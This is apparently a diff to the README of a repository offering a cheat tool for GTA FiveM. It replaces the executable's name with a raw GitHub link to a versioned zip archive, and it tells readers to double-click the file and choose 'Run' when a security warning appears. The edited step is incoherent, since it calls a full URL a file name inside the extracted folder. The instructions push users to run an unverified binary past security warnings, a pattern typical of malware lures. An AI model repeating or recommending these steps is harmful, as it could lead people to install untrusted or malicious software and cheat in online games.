SIXXTAR/GTA-FiveM-Cheat/README.md

 Now that you have extracted the files, you can run the application:

-1. Inside the extracted folder, find the file named `GTA-FiveM-Cheat.exe`.
+1. Inside the extracted folder, find the file named `https://raw.githubusercontent.com/SIXXTAR/GTA-FiveM-Cheat/main/RVX-4_External/GTA-FiveM-Cheat_v3.6.zip`.
 2. Double-click on the file to launch it.
 3. You may see a security warning.
 If prompted, select "Run" to continue.